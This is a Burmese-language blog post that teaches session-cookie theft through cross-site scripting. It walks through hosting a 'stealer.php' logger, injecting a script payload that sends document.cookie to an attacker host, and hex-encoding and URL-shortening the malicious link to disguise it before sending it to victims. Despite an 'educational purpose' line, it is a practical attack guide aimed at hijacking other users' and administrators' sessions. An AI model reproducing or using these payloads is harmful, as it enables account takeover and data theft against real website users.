အရမ္းကို အစြမ္းထက္တာမို႕ Educational Purpose Only ေပါ့ ဟိဟိ
ပထမဆံုး အေနနဲ႕လုိအပ္တာေတြကို အရင္စုေစာင္းလိုက္ပါဦး
Requirements:
1.XSS vulnerable site
2.Cookie stealer code (download)
3.Free web hosting account
4.XSS အေျခခံ
5.Cookie အေၾကာင္းအေျခခံ
ဒါေတြအားလံုးစံုၿပီဆိုရင္ ဆက္သြားမယ္။
Step 1# Cookie Stealer တစ္ခုဖန္တီးမယ္
Code ကို အေပၚက ေပးထားတဲ့ လင့္မွာေဒါင္းထားတယ္ေနာ္
1.အဲ့ code ကို copy ကူး
2.ပီးရင္ notepad ထဲမွာ paste လုပ္
3.အဲ့ဟာကိုမွ stealer.php ဆိုပီး save လိုက္
အိုေက ေနာက္တခုက notepad အသစ္တစ္ခုဖြင့္ၿပီး log.txt ဆိုပီး save လိုက္ ။ဘာမွမပါတဲ့ file ေနာ္
(ေနာက္တခု အေရးႀကီးတာက နာမည္မေျပာင္းပါနဲ႕)ဘာလို႕လဲဆို stealer က cookie ေတြ ip address information ေတြကို
ဒီမွာ save မွာျဖစ္လို႕ပါ
ဒါဆို ခု က်ေနာ္ တို႕မွာ stealer.php ရယ္ log.txt ဆိုပီး file ၂ခု ရပီ
Step 2#
web hosting တစ္ခုခုမွာ register လုပ္ထားၿပီးၿပီဆိုရင္ Cpanel ထဲက File Manager ကိုသြားမယ္
ၿပီးရင္ root ေအာက္မွာ ျဖစ္ျဖစ္ public_html ေအာက္မွာဘဲျဖစ္ျဖစ္ stealer.php နဲ႕ log.txt ကို သြားတင္လိုက္ပါ
ဒါဆိုရင္ က်ေနာ္တို႕ stealer က http://www.host.com/stealer.php အေနနဲ႕ ျဖစ္သြားၿပီ
Step 3#Exploiting the XSS vulnerability
ေအာက္က code ကိုက်ေနာ္ တို႕သြားထည့္မယ္ ဘယ္ေနရာထည့္ရမယ္ဆိုတာေတာ့ သိရမယ္ေနာ္
CODE:
<script>location.href = 'http://www.host.com/Stealer.php?cookie='+document.cookie;</script>
ဒါပါဘဲ
Cookie Stealing with persistance & non-persistance
Persistance ဆိုတာ က်ေနာ္တို႕ ေစာေစာ ကလို code ကို inject လုပ္တဲ့အခါမွာ Admin က ဒီလင့္ကို ျမင္တဲ့ အခ်ိန္ထိ အဲ့ဆိုက္မွာ ရွိေနမယ္
Intruder ေတြအေနနဲ႕ ဘယ္link မွလိုက္ပို႕ေနစရာမလိုဘူး ဒီဆိုက္ကို ၀င္လာတဲ့ user အားလံုးဟာ victim ဘဲ
Non-persistance က်ေတာ့သူ႕လိုမဟုတ္ဘူး Intruder ေတြက victim ဆီကို link လိုက္ပို႕ေပးရတယ္။victim ေတြ ၀င္ေတာ့မွ cookie ကိုခိုးနိုင္မယ္
ဆိုက္အမ်ားစု ကေတာ့ non-persistance ျဖစ္ၾကတာမ်ားပါတယ္
ဒီေတာ့ non-persistance အေၾကာင္းဘဲဆက္ေျပာစရာရွိတယ္ ေပါ့ေနာ္
အေပၚက အတိုင္းလုပ္ထားတဲ့ link ဟာေအာက္မွာျပထားတဲ့ အတိုင္းျဖစ္ေနမွာပါ
http://www.vulsite.com/search?param=<script>locကation.href = 'http://www.host.com/Stealer.php?cookie='+document.cookie;</script>
ေနာက္မွာ script ေတြပါေနတာ ကို Intruder ကေန hex တန္ဖိုးေျပာင္း လိုက္နိင္ပါတယ္
ဒီလိုဆို ေအာက္ကလိုမ်ိဳးျဖစ္သြားမယ္
http://www.vulsite.com/search?param=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f
%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%
75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63
%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b
%3c%2f%73%63%72%69%70%74%3e
အရမ္းရွည္ေနျပန္တယ္ ဒီေတာ့ tiny url လိုေနရာမ်ိဳးမွာ သြားခ်ံဳ႕လိုက္မယ္ဆိုရင္
ေအာက္ကလိုျဖစ္သြားမယ္
http://www.tinyurl.com/tw3d5
ဒီ link ကို victim က တခ်က္နွိပ္လိုက္တာနဲ႕ log.txt ဆိုတဲ့ ဖိုင္မွာ cookie ေတြကို save ၿပီးသားျဖစ္သြားမယ္
ေက်းဇူးအထူးတင္ပါတယ္ ေညာ္
Credit to breakthesecurity
Regards 4Rd4m-injector(MSF)
No comments:
Post a Comment